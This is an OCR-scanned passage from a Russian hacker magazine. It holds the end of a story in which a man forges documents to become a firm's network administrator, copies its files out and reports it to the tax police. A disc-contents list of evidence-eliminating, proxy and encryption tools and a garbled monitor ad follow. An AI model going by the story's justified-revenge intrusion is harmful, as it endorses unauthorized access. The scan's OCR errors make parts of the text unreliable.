катушек съехал. Вот и позавчера пришел, навеселе уже с ут- 
ра. Входит ко мне и говорит: "Слышишь, Лена, все с шефом 
уехали на какую-то консреренцию, а мне надо кое-что пере- 
настроить, я ведь первого числа каждого месяца пароли ме- 
няю... Вот, возьми бумажку, чтобы не забыть - тут у меня па- 
роль для настройки записан, временный. Иди к шефу в каби- 
нет, включи там комп, я поработаю на сервере. Потом при- 
коннектишься по этому паролю, я проверю политики..." Ну, я 
пошла, наплевала на работу... Сижу, жду. Он мне кричит из 
своей комнаты, типа давай. Я даю. Полчаса, час. Я уже все 
пасьянсы по двадцать раз сложила. Ни ответа, ни привета. 
Встала, пошла туда к нему. Он на стуле раскинулся, ноги-ру- 
ки врассыпную - спит. Ну, я будить не стала... А он проснул- 
ся, да видать забыл, что ни хрена не сделал. Собрался и go- 
мой утопал. А пароль так и остался - один на всех. Знаешь, 
какой? "Ведьма". Черт его знает, почему... 

Громов сидел, не шелохнувшись. Такого подарка от адми- 
на многие хакеры не получают никогда в жизни. А тут на прос- 
тую секретаршу свалилось все, что только можно унести... 

- Я два дня с собой боролась. Все вспоминала, как тогда с 
"Курском" вышло. До сих пор не могу понять, как я не прого- 
ворилась за эти годы... Ну, да падно, это все лирика, как го- 
ворит один мой знакомый. Знаешь, мне все время, что я на 
фирме работаю, было интересно, что мы такое продаем, что 
начальство скоро на частных самолетах будет летать. И вот 
я думаю, хоть буду знать, за что сяду. Все-таки деньги шеф 
приличные давал, не по нашему нищему времени. Ну, я эту 
самую "ведьму" и запустила... В пару срайлов заглянула - 
фигня какая-то, оплата счетов за свет, за воду, за телефон. 
Чего их секретить? Сначала подумала, что вообще ничего 
не найду. Может, у самых секретных документов другое мес- 
то хранения, другой способ доступа. Не yragana. Дальше no- 
лезла. А там... Все у меня под носом было. 

- Что? - шепнул Громов, почему-то думая, что Ленка 
влезла в уголовщину. 

- Алмазы. 

- Что? - не сразу врубился Борис. 

- Что слышал. Контрабанда. Судя по всему, не такая уж 
и великая, но тем не менее! 

- Так вот этот фингал тебе за алмазы? - не понял Гро- 
мов. - Он же тебя за них грохнуть должен был, дура! 

- Нуя же сказала, что я везучая, - попыталась улыб- 
нуться Лена. - Все криминальное к тому времени, когда ме- 
ня застукали, я уже свернула. Поймал он меня на вот этих 
самых счетах, которые я забыла закрыть. Прямо адмирал 


из-за спины набросился! Только ничего он мне не говорил, 
просто ка-а-ак треснет в глаз! Потом еще в спину пихнул, я 
колготки под джинсами порвала-а... - и тут ее снова проби- 
ло, она зарыдала, заново переживая все то, что случилось 
у нее на работе, теперь уже бывшей. 

Борис обнял ее, стараясь успокоить. 

- Да-а, два раза по лицу за один день - многовато, - пока- 
чал он головой. Лена отстранилась немного, посмотрела на 
него непонимающе. Сквозь слезы увидела припухшую скулу, 
вздрогнула от неожиданности. Громов рассказал ей обо всем, 
кроме кода неизвестного происхождения. Ленка прижалась к 
нему, пожалела. Борис, обнимая ее за плечи, думал, думап... 

И когда она уснула у него на руках, он уже знал, что бу- 
дет делать. 

Спустя двое суток после жестокого увольнения Лены в 
дверь сирмы "Мета-Транс" позвонил молодой парень, да- 
леко не мажорного вида. Вся его одежда говорила о скром- 
ном достатке. Секьюрити внимательно осмотрел его сверху 
донизу в щелку приоткрытой двери, хмыкнул и поинтере- 
совался, чего парню надо. 

- Я к вашему боссу, по части компьютерной безопаснос- 
ти, - довольно развязно сказал парень. - Доложи, не пожа- 
леете. 

Тот доложил. Не быстро, правда. Ну, да он там в тепле, 
не понимает, каково на морозе стоять, с ноги на ногу пере- 
минаясь. Впустили. Длинный коридор, большие вазы с фи- 
кусами и пальмами, как на "Титанике". Один впереди по- 
шел, в ухе пимпа с проводом куда-то за шиворот, второй 
остался у дверей, периодически прикладывался к "глазку" 
и чего-то шептал в воротник пиджака. 

Громов шел, ни о чем не думая. Все было им решено еще 
в тот день, когда Ленка рыдала на его плече. План поначалу 
казался фантастическим, при ближайшем рассмотрении Бо- 
рис даже видел в нем абсолютно невыполнимые моменты. 
Но сейчас самым главным было проникнуть в эту контору. 
Наспех сфабрикованные на компьютере диплом и трудовая 
книжка были, конечно, сыроватыми, но чем черт не шутит! 

Пара поворотов, несколько закрытых дверей по обе 
стороны. Что характерно, безо всяких на них табличек и 
даже элементарных номеров. В конце коридора большая 
обитая темно-коричневым материалом дверь с бронзовой 
ручкой. Справа от двери стол серого офисного цвета с мо- 
нитором. Стул у стены пустовал. Рядом с монитором, почти 
закатившись под него, лежала неуместная здесь губная 
помада "Эсте Лаудер". "Здесь сидела Ленка", - догадался 
Громов. Тем временем сопровождающий остановился пе- 
ред дверью, нажал невидимую Борису кнопку. 

- Да, - раздался откуда-то с потолка транссрормирован- 
ный динамиком голос. 

- Тот самый парень... По части компьютеров, - глуповато 
наклоняясь к двери, сказал секьюрити. - Чистый. 

"Судя по всему, те кактусы и фикусы в коридоре не толь- 
ко для красоты, - понял Громов. - Наверняка, и металлоиска- 
тели, и еще что-нибудь от "жучков"... Серьезно здесь. Как 
еще Ленка сюда смогла устроиться в свое время?!" 

Дверь тем временем открылась сама. "Зачем тогда руч- 
ка?" - удивился Громов, стянул с головы рэперскую шапоч- 
ку с надписью "Down Low" и вошел внутрь. Кабинет пора- 
зил отсутствием всяких излишеств, которыми современные 
хозяева жизни наполняли свои рабочие пространства. Ни 
тебе телевизора в полстены, ни шикарной мебели, ни кар- 
тин - только рабочий стол, на котором удачно размести- 
лись "жидкий" монитор и телесфон с сфаксовой приставкой. 
Предметом роскоши можно было с натяжкой считать пре- 
зидентский набор, состоящий из подставки аля перьевой 
ручки, самой ручки, чернильницы и перекидного календа- 
ря. Все это было упаковано в красное дерево и венчалось 
маленьким гербом России со стороны, обращенной к во- 
шедшему Громову. Первым впечатлением было: "Интересы 
государства здесь блюдут почище личных". Но Борис дав- 
но уже не доверял первым впечатлениям. 

По ту сторону стола в кожаном вращающемся кресле с 
высокой (выше головы) спинкой тихо покачивался чело- 
век, который ударил Ленку. Громов сделал к нему несколь- 


ко шагов, остановился посреди кабинета и картинно огля- 
делся. В последнюю очередь он остановил свой взгляд на 
хозяине. Лысоват. Хмур. Очков не носит, но немного щурит- 
ся. Видимо, не хочет показываться в очках перед своими 
сотрудниками, хотя дома, наверняка, напяливает их на нос, 
когда читает "Коммерсант". Отличный костюм. Удачно по- 
добранный галстук. Часы - золото. Запонки с камнями. 
Взгляд - пронзительный. Судя по всему, он просто обязан 
всех подозревать в причастности к миру спецслужб. Если 
Ленка не ошиблась, здесь царит жуткий криминал. 

- С кем имею честь?.. - спросил человек из глубины 
своего кресла. Борис ожидал чего-то вроде "В чем проб- 
nema, парень?", поэтому немного тормознул с ответом. - 
Говорить будем? 

Громов кивнул, вспомнил синяк под глазом у Лены, 
скрипнул зубами и ответил: 

- Я по поводу работы... Вот мой диплом, вот трудовая 
книжка... 

Он протянул боссу картонки. Тот не взглянул на них, 
пришлось положить перед ним на стол. Все документы бы- 
ли оформлены на липовое имя, поэтому Борис не спешил 
представляться, прокручивая в голове ту легенду, которую 
создал себе сам. 

- Откуда сведения о рабочем месте? - сухо поинтересо- 
Banca шефр. 

- Да, в общем-то... Знаю, что у вас админ любит за во- 
ротник закладывать. Откуда знаю - лучше не спрашивайте. 
У нас, таких как я, своя сеть общения, как говорится, "не 
интернетом единым". 


Громов шел, ни о чем не 
думая. Все было им решено 
еще в тот день, когда Ленка 

рыдала на его плече. 


- То есть ты его утопить пришел? - хмыкнул хозяин. - 
Странная у вас, у таких, как ты, профессиональная этика. 
Крайне странная... 

- Что поделать, - пожал плечами Громов. - В наше время 
без работы никуда. 

- Да уж, - покачал головой Wwecp. - Вот как выходит... Про 
порок нашего Алексея известно уже далеко за стенами уч- 
реждения. Это плохо, очень плохо. Учитывая особенности 
нашего... моего бизнеса. Значит, считаешь, что ты в срав- 
нении с Алексеем - просто эталон порядочности, полное от- 
сутствие вредных привычек, точность, аккуратность, пунк- 
туальность и полный набор профессионализма? 

Громов задумался на секунду, потом кивнул: 

- Хотите проверить - проверяйте. Давайте я ваш сервер 
грохну? Это в качестве теста подойдет? 

- Меня, кстати, Виктор Петрович зовут, - почему-то вдруг 
решил представиться хозяин. Борис в ответ назвал свое 
новое имя из подделанного диплома. Встав из-за стола, 
босс подошел к Громову, остановился от него в трех ша- 
гах, взял его документы, внимательно изучил, потом сост- 
роил довольную гримасу и произнес: 

- Ничего ломать не надо, слишком дорого будет стоить. 
А ты наглый, - удовлетворенно добавил он спустя пару се- 
куно. - Будет несколько условий. Во-первых, есть докумен- 
ты, которые смотрю только я. Будешь давать всем пароли, 
можешь знать чьи угодно, но только не мой... 

- Будете каждый раз сами вводить? - ухмыльнулся Борис. 

- Если будет надо, даже ночью сюда приду, - отрезал Вик- 
тор Петрович. - Во-вторых, не пытайся сам залезать туда, ку- 
ga не надо. Работаем мы... С чем приходится. Очень много 
чего проходит через компьютеры нашей сфирмы в течение 
дня. Ошибок быть не должно - это однозначно. Если хочешь, 
делай так, как привык сам. Лехину работу можешь похерить, 
он, считай, уже уволен. Сколько тебе надо времени? 

- День. Максимум два, - уверенно произнес Борис. Он 


понятия не имел, что там нагородил низложенный админи- у 
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стратор сети, но дольше он тут задерживаться не собирал- 
ся. Виктор Петрович протянул руку к селектору, что-то на- 
жал, сказал пару ласковых в адрес Алексея. 

"Бедный парень, я его даже не видел, - почему-то вдруг 
пожалел его Громов. - Но если бы он тут чего-нибудь спья- 
ну напортачил, то его, наверное, очень быстро бы в цемент 
закатали... Будем считать, я его спасаю!" 

- Все, - коротко сказал он, вновь повернувшись к свое- 
му новому работнику. - Можешь идти на свое место. По ко- 
ридору третья дверь налево... 

Громов чуть не сказал "Я знаю", но вовремя прикусил 
язык, просто кивнув головой. 

- Да, иеще, - спохватился Виктор Петрович, когда Борис 
уже был готов развернуться и идти. - У меня тут секретар- 
ша... Понимаешь... Забеременела, черт побери, не вовремя. 
Короче, если что, поможешь кое-что набрать, позвонить... 
Ну, ты понял. 

Громов чуть на пол не сел от подобного заявления. "За- 
беременела..." Ни хрена себе беременность! Но, с другой 
стороны, не будет же он каждому встречному говорить, что 
вчера тут одной девушке засветил в глаз. Борис кивнул 
еще раз, вышел в коридор и увидел, как в дальнем конце 
двое охранников под руки выводят человека, подающего 
вялые признаки жизни в виде шевеления руками и громко- 
го сопения. Это покидал свое рабочее место ничего не по- 
нимающий Алексей. 

Борис вошел в кабинет, присел на стул у входа и огля- 
делся. Сразу в глаза бросилась пустая пивная банка, валя- 
ющаяся под столом. "Почему серьезная организация дер- 
жала на работе такое убожество? - подумал Борис. - Ведь 


„только рабочий стол, на 
котором удачно разместились 
"жидкий" монитор и телесон 

с факсовой приставкой. 


он, по определению, был едва ли не самым слабым звеном. 
И Лена это доказала, да еще какой ценой". 

Громов встал, подошел к рабочему месту администрато- 
ра, опустился в кресло, положил руки сначала на блестя- 
щие от частых прикосновений подлокотники, потом на кла- 
виатуру. Конечно, за компьютером он чувствовал себя го- 
раздо увереннее, но все-таки не настолько, чтобы вздох- 
нуть полной грудью и расслабиться. Он аккуратно прошел- 
ся "мышкой" над значками. Нажимать ни на что не хоте- 
лось. Необходимо было время, чтобы свыкнуться с 
мыслью, что он стал на пару дней админом некой крими- 
нальной конторы и взял на себя смелость кое-кому отомс- 
тить. Отомстить по-крупному. 

Борис решительно залез во внутренности сети конторы. 
Вначале ему нужны были эти чертовы алмазы. Через "Поиск 
файлов" он ввел слово "алмаз" в качестве ключевого (чтобы 
особенно не париться с падежами и числами). Машинка за- 
шуршала. Судя по всему, "железо" было слабеньксе, ско- 
рость обработки была не ахти какая. Громов особенно не на- 
деялся на быстрый результат поиска, поэтому встал, подошел 
к двери, выглянул в коридор. Никого. 

Вернулся на место. Комп пока ничего не нашел. "Неуди- 
вительно, - подумалось Громову. - Я не такой везучий, как 
Лена. У той все сразу - и "Елочка", и "Ведьма" с алмаза- 
Mu..." А хотелось бы побыстрее. 

В коридоре раздались приближающиеся шаги. Борис 
быстро свернул окошко поиска, ткнул не глядя куда-то в 
"Администрирование", вытащил на экран что-то уж очень 
заумное и принялся внимательно разглядывать. В кабинет 
вошел шебр. 

- Ну, как хозяйство? - спросил он, так же, как и Борис, 
сразу заметив банку из-под пива. - Не твоя? - Кивнув на 
нее, уже строже произнес он. 

Громов откатился немного назад, шутливо поднял руки 
над головой: 


- Не дай бог, начальник... Да нет, что вы, прийти на сме- 
ну алкашу и через десять минут попасться на том же са- 
MOM? Ну, через пару месяцев еще куда ни шло. 

Виктор Петрович посмеялся, довольно натянуто, как ак- 
тер на встрече с изрядно поднадоевшими зрителями. 

- Ну-ну, - похлопал он по плечу Бориса. - Музыку лю- 
бишь? - внезапно спросил он. 

Громов, честно признаться, не ожидал подобного вопроса. 

- Вообще-то, да, но смотря... 

- Смотря какую? - договорил Виктор Петрович. - Всякую. Но 
это я так спросил, не обращай внимания. Ладно, не буду ме- 
шать, работай. Я думаю, у Алексея не все здесь было хорошо... 

Громов согласно кивнул и принялся с умным видом на- 
жимать на кнопки на экране монитора. Начальник в тече- 
ние пары минут понаблюдал за его работой со стороны, но, 
судя по всему, ничего не понял. А Борису него на глазах, 
не зная, чем заняться, шарился по реестру, заменяя те зна- 
чения, которые знал, необходимыми. Работы было, 
действительно, непочатый край. 

Поиск завершен: "Файлов найдено: 1". 

- Негусто, - сам себе тихо сказал Борис, прочитал пол- 
ное имя файла и присвистнул. 

- Свети, мой сумасшедший алмаз, - произнес он вслух. - 
Эх, Леночка, Леночка, угораздило же тебя, слово на компе 
встречается в единственном числе, но ты и тут по части ве- 
зения опередила всех. Никогда не любил идиотские пере- 
воды. Но, с другой стороны, иногда полезно знать, что 
скрывается за всеми этими "| love you" и прочей английс- 
кой дребеденью. 

Борис размял пальцы над клавиатурой, наморщил лоб, 
что-то вспоминая, потом практически одной пулеметной оче- 
редью ввел в поле поиска: "Pink Floyd". После чего отъехал 
на кресле на середину комнаты и пропел, перевирая мотив: 

- We don't need no education... 

Кресло невесело отозвалось своим скрипом. A тем вре- 
менем в окошке поиска огромным списком выстраивались 
какие-то файлы. Громов решил дождаться окончания 
процесса, встал, отошел к раковине, ополоснул лицо ле- 
дяной водой. Кое-что в его голове стало проясняться нас- 
чет этой конторы и Ленкиных "алмазов". То, что здесь 
этими самыми алмазами не торговали, Громов уже не сом- 
невался. Но свою догадку он отложил до того момента, 
как закончится поиск. 

Сервер бибикнул. Борис подошел, взглянул. "Файлов 
найдено: 168". Ну, еще бы - перед ним в окне поисковика 
была почти вся дискография "Pink Floyd" в формате mp3, 
том самом формате, который перевернул в Сети npegc- 
тавление об авторских правах. 

- Вот какими алмазами вы здесь торгуете, - понимаю- 
ще покачал головой Борис. Потом внимательно просмот- 
рел папки, доступ в которые можно было получить при 
помощи Лехиной "Ведьмы", которая продолжала доволь- 
но удачно фигурировать и после ухода ее создателя. 
Нашлись и те файлы, за которые пострадала Лена - счета 
за коммунальные услуги, свет, телефон, интернет и много 
чего еще интересного. Судя по адресу, помещение, кото- 
рое наматывало все эти рубли и киловатты на себя, нахо- 
дилось в одном из отдаленных районов города. 

- Вот ты почему про музыку спросил, - потирая руки, 
злорадно сказал Громов. - Тут ты прокололся. У кого что 
болит... Ну и химичил бы со своей музыкой, гад, но зачем 
же девчонку бить! 

"Ведь мог же этот Виктор Петрович, чтоб ему только 
"Ласковый май" всю жизнь слушать! Ведь мог же он 
спустить все на тормозах, даже сказать Лене часть прав- 
ды. Не думаю я, что она стала бы специально копать под 
своего шебра. Сейчас каждая вторая фирма на своих пле- 
чах половину Уголовного кодекса носит, и об этом многие 
подозревают, но ведь молчат, потому что их "алмазы" 
при ближайшем рассмотрении ни на что не тянут! Ну уво- 
лил бы тебя, дурочка... Но за что же ты, сука, по лицу ее!" 

Руки нащупали в кармане листок с заветными строка- 
ми. Громов извлек его из глубин внутреннего кармана, 
развернул. На обратной стороне был написан адрес фай- 


лового сервера, с хозяином которого договорился вчера. Те- 
перь он имел полную свободу по заливанию на него любой 
информации, за что, правда, нес полную финансовую OT- 
ветственность - любое нарушение работы сервера по ви- 
не Бориса влекло за собой расставание с приличной сум- 
мой бабок. Громов уверил хозяина в том, что ничего кри- 
минального не будет, что информация будет храниться на 
его винчестерах всего-то пару-другую часов. В случае 
крайней необходимости - день. Получив скрытый от посто- 
ронних глаз личный каталог и записав пароль на подклю- 
чение, Громов сейчас, сверяясь с листиком бумаги, прет- 
ворял подключение в жизнь. 

Пройдясь "Ведьмой" по нескольким папкам, Громов 
вытаскивал один за другим файлы, подтверждающие 
существование того самого здания, которое и давало 
фирме Виктора Петровича основной доход. Счета, фак- 
туры, еще какие-то непонятные отчеты - все он свали- 
вал в одну кучу, благо выделенная линия на высокой 
скорости справлялась с потоком информации на "от- 
лично". Внезапно в ряде бесконечных цифр и балансо- 
вых смет он обнаружил документ, указывающий на то, 
что это самое здание - бывший цех по ремонту аудио- и 
видеоаппаратуры, и снесено оно еще три года назад по 
плану реконструкции и перепланировки городских тер- 
риторий. "Да-а, - пожал плечами Громов. - Дома уже 
три года как нет, а за свет и телефон платят исправно, 
и хоть бы кому в голову пришло сопоставить... Хотя 
бардак, он и есть бардак". 

- Неужели Алексей всего этого не видел? - вслух про- 
изнес Громов и машинально оглянулся. - Все как на ладо- 
ни. Вот еще тоже мастер, ведь замели бы вместе со всеми. 

Поток файлов не иссякал. Громов понимал, что пере- 
качать все он просто не в состоянии, время от времени 
выскакивали предупреждения о запрете доступа, а паро- 
ли Леха унес вместе с пивом, которое плескалось у него 
в мозгах. Периодически он попадал в каталоги с названи- 
ями "Accept", "Garbage", "Газманов", "Фабрика звезд" - 
фирма Виктора Петровича не гнушалась ничем. Самое 
интересное, что когда Борис попытался просмотреть со- 
держимое этих каталогов, то у некоторых российских ис- 
полнителей он обнаружил хиты, которых еще не было в 
продаже. Судя по всему, на контору работала неплохая 
агентура, имевшая прямой доступ к студиям звукозаписи. 
Новые песни скупались еще в сыром виде и выдавались 
за оригиналы - что-то вроде экранных копий, снятых с эк- 
рана телевизора, отчего изображение в них казалось на- 
тянутым на мячик. 

- Значит, вот чем ты промышляешь, - бурчал себе под 
нос Громов. - Цех по записи контрафактной продукции. 
Новый альбом Аллы Пугачевой... Да его еще нигде даже 
не рекламировали! Сборник ремиксов Селин Дион. Кто у 
нее отличит оригиналы от ремиксов, кроме меломанов! 
Конечно, ты у нас определяешь вкусы в этом городе, ко- 
му чего слушать и в каком качестве. То-то я смотрю, как 
ни купишь диск, то он скачет, то песни некоторые не до- 
писаны! А ты, наверное, девяносто процентов рынка в го- 
роде контропируешь, судя по твой фонотеке... 

Он вспомнил зареванную Ленку. Интересно, что ждало 
бы Бориса в случае разоблачения? Синяком он вряд ли 
бы отделался, скорее всего, не дошел бы сегодня до дома. 

Пока поток информации уходил в тайное хранилище 
где-то в подвалах города, Борис зашел на основной сайт 
инспекции по налогам и сборам, выбрал там региональ- 
ное отделение и отбил им письмецо с точным указанием 
каталога, в котором будут храниться перекачанные доку- 
менты, не забыв сообщить пароль на доступ. 

Потом извлек из-за пазухи диск с последней версией 
Delphi, установил ее, набрал те самые четырнадцать 
строк, практически не заглядывая в листок, настолько 
четко они отпечатались в его памяти. Откомпилировал, 
полученный файл вытащил на рабочий стол, обозвал его 
"ХОЧЕШЬ МУЗЫКИ, ПЕТРОВИЧ?", уже собрался удалить 
среду программирования и уходить. Как Bgpyr обратил 
внимание, что в коде, который он только что набирал 


своими руками и собирал в исполняемый сфайл, что-то не- 
уловимо изменилось. С первого взгляда он не уловил, 
что именно, но когда увидел в строке состояния статисти- 
ку, то понял - он имеет дело с чем-то сверхъестествен- 
ным. СТРОК БЫЛО ВОСЕМНАДЦАТЬ. 

Вроде бы все то же самое. Пробежал глазами повни- 
мательнее - увидел, что кое-что добавилось, кое-что из- 
менилось. Camo. Подумалось: "Меня достал Колян со сво- 
ей базой, и появились эти чертовы строки. Теперь Петро- 
вич достал мою Лену, и они растут как на дрожжах. Неу- 
жели все дело во мне?" 

- Самое интересное, я понятия не имею, как эта штука 
сработает, - шепнул Громов. - Bgpyr эта программа теперь 
будет "Тома и Джерри" показывать круглосуточно... Коро- 
че, надо валить отсюда. 

Аккуратно отворил дверь, огляделся. Охранника у две- 
ри отсюда не было видно. Громов вышел в коридор, пос- 
мотрел по сторонам и, воровато озираясь, подобрался к 
секретарскому столу, вытащил из-под монитора помаду и 
сунул в карман. 

- Все-таки Эсте Лаудер, - сам себе прокомментировал 
этот поступок Громов, после чего пошел к дверям. Секью- 
рити злобно взглянул на него. 

- Шеф приказал купить все, что мне нужно для про- 
дуктивной работы, - объяснил он свой уход. Охранник 
провел по контуру тела металлоискателем. Приборчик ак- 
куратно прогудел и мигнул зеленым. 

- Ты что, думаешь, я компьютер в кармане выношу? - 
хмыкнул Борис. - Слушай, а ты музыку любишь? 

Секьюрити молча открыл дверь и отвернулся. 


И он ударил по клавиатуре 
кулаком, со всей силы... 


- Ну и ладно, - улыбнулся Борис, нащупал в кармане 
помаду и подумал: "Слава богу, она не железная!" 

На улице было морозно, тихо, падал редкий снежок. 
Громов оглянулся на дверь фирмы, прищурился. 

- Ну, пока, - сказал он непонятно кому и пошел домой... 
Дежурный оператор налоговой полиции в течение 
дня получал много всяких посланий явно стукаческого 
содержания. Одни соседи доносили на других, пенсио- 

неры на "новых русских", бедные на богатых, конку- 
ренты друг на друга. Но то письмо, что пришло сегодня 
после обеда... 

Когда дверь в офис вышибли умелые бойцы из Hano- 
говой полиции, никакой толстомордый охранник был не 
в состоянии их удержать. Его просто смяли, как ненуж- 
ную игрушку, уложили у стены лицом вниз и в самой ка- 
тегоричной форме потребовали заткнуться. Директор, 
услышав шум в коридоре, не стал долго разбираться, а 
сразу кинулся туда, где, по его разумению, сидел чело- 
век, который должен был замести следы. Но комната 
оказалась пуста, а на экране, в самом центре, светилась 
улыбающаяся рожица с подписью "ХОЧЕШЬ МУЗЫКИ, 
ПЕТРОВИЧ?" 

- Твою мать, что делать?! - закричал он, слыша, как 
бойцы выносят двери в коридоре, блокируя все переме- 
щения по офису. - Где эта nagna?! 

И он ударил по клавиатуре кулаком, со всей силы... 

Сильный взрыв снес несколько искусственных стен в 
конторе. Что-то из-под стола ударило директора по ногам 
и отшвырнуло к окну. Он ударился головой об радиатор 
отопления и на некоторое время выключился. Пришел в 
себя уже в машине, с наручниками и огромным багровым 
кровопоодтеком на левой щеке... 

Борис протянул Лене помаду: 

- Держи. Все-таки "Эсте Лаудер". Как-никак я пода- 
pun... Елочка. 

Она благодарно прикоснулась к его щеке. [BE 
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Кардинг - это прес- 
К тупление. Хотя оно и 

вирутальное, но пос- 
ладить за него тебя могут 
вполне реально. Так что да- 
вай не будем создавать из- 
лишний ореол романтики 
вокруг этого занятия. Я иск- 
ренне неадеюсь, что доки на 
диске ты используешь иск- 
лючительно в ознакомитель- 
ных целях. А софт для защи- 
ты, шифрования и заметания 
следов с диска ты будешь 
использовать только в прис- 
тупах паранои и мании прес- 
ледования :). А когда оклема- 
ешься - поставишь свежие 
обновления для Windows и 
софт от NoName :). 
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CLEANING TOOLS 
Smart Protector Pro 
Evidence Eliminator 
FlashClean 

Drive Scrubber 
Total Cleaner 

Clean Center 


PROXY TOOLS 
Anonimity 4 Proxy 

Proxy Checker 

WE ProxyCheker 

Proxy Hunter 

Socks Cheker 

SocksChain 

SocksCap 

Sreganos Internet Anonym 
SurfNOW 


БРАНДМАУЭРЫ 
Kaspersky AntiHacker 1.5 
Kerio Personal Firewall 2.1.5 
Outpost 1.0 

Outpost 2.0 Pro 

ZoneAlarm 3.7 

ZoneAlarm Pro 4.0 


БРАНДМАУЭРЫ 
Kaspersky AntiHacker 1.5 
Kerio Personal Firewall 2.1.5 
Tiny Personal Firewall 
Outpost 2.0 Pro 

Norton Personal Firewall 


CRYPTO TOOLS 
BestCrypt 
BestCrypt for Linux 
BCWipe 

CryptoAPI for Linux 
DriveCrypt 


ВЕСЬ СОФТ ИЗ НОМЕРА! 


® Спец 01(26), Новый Год 
в цифровом формате 


® Обновления для Windows 


® Сайты и доки из номера 


И ЕЩЕ: 


Dekart Private Disk Light 
PGP Personal 

PGP Enterprise 

GNUPG 

Steganos Security Suite 
S-Tools 


SECURE MESSAGING 

Silc Client for Win&Linux 
Silc Server for Win&Linux 
Encrypt plugin for mIRC 
Miranda 

SecurelM plugin 

Tkabber 

Waste for Windows 

Waste for Linux with source 


СОФТ OT NONAME 

Iby1 v1.39 

7-Zip v3.09.02 

Apollo Control v1.0 
AnalogX Proxy v4.14 
AVIcodec v1.1.0.4 

Catalog Hot Files Pro v1.30 
CDex v1.51 

ICE Book Reader Pro v5.0 
iMesh v4.2 

IrfanView 3.85 

MDialer v4.1 

Nero v6.00.15 

NetView v2.79 


Power Off v5.3 

Справочник лекарственных средств V2.5 
SpamPal v1.50 

The Bat! v2.00.22 

TMeter v4.4.0.120 
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И все-таки он вертится! 


Экранное разрешение 1600х1200 
(095) 288-6130, 288-6117 — Ч5В-интерфейс 


г.Москва: Атлантик Компьютерс (095) 240-2097; Банкос (095) 128-9022; Березка (095) 362-7840; ДЕЛ (095) 250-5536; Инкотрейд (095) 176-2873; Инфорсер (095) 747-3178; 
КИТ-компьютер (095) 777-6655; Компьютеры и офис (095) 918-1117; Компьютерный салон SMS (095) 956-1225; ЛИНК и К (095) 784-6618; НИКС (095) 974-3333; 
Сетевая Лаборатория (095) 784-6490; СКИД (095) 956-8426; Техмаркет Компьютерс (095) 363-9333; Ф-Центр (095) 472-6401; Flake (095) 236-9925; ISM Computers (095) 319-8175; 
OLDI (095) 105-0700; POLARIS (095) 755-5557; R-Style (095) 904-1001; г.Архангельск: Северная Корона (8182) 653-525; г.Волгоград: Техком (8442) 975-937; 
г.Воронеж: Сани (0732) 733-222, 742-148; г.Иркутск: Комтек (3952) 258-338; г.Липецк: Регард-тур (0742) 485-285; г.Тюмень: ИНЭКС-Техника (3452) 390-036. 


г 3 ЕЕЛТГОМ" F700P 
Абсолютно плоский экран 

2 D \/ Размер точки 0,24 мм 

bs - ша 1cto па Частота развертки 95 кГц 


Так выглядят объекты 
в движении на экране 
SyncMaster 172% 


Beard 16 миллисекунд! Это = время реакции матрицы, испюльзующейся 
Е новых мониторах SyncMaster 152%/172Х Результат = и в играх. и пон 
просмотре OVO изображение остается чаткым даже в самых динамичных 
сценах. Отличная цветопередача. широкнй угол обзора. впрочем, 
не только качества изображения OBL мониторов Synchlaster засуживает 
превосходных оценок. Судите сами. Компактный элегантный корпус 
с узкоя рамкой Малый pec всего 25 кг у SyncMaster 182%. Наконец 
OHOMIHA места и порядож на Вашем столё — все разъвыы распкупосвоены 
на подставке MOH. Moning SyncMaster (SFX ee Boe очевыдно| 
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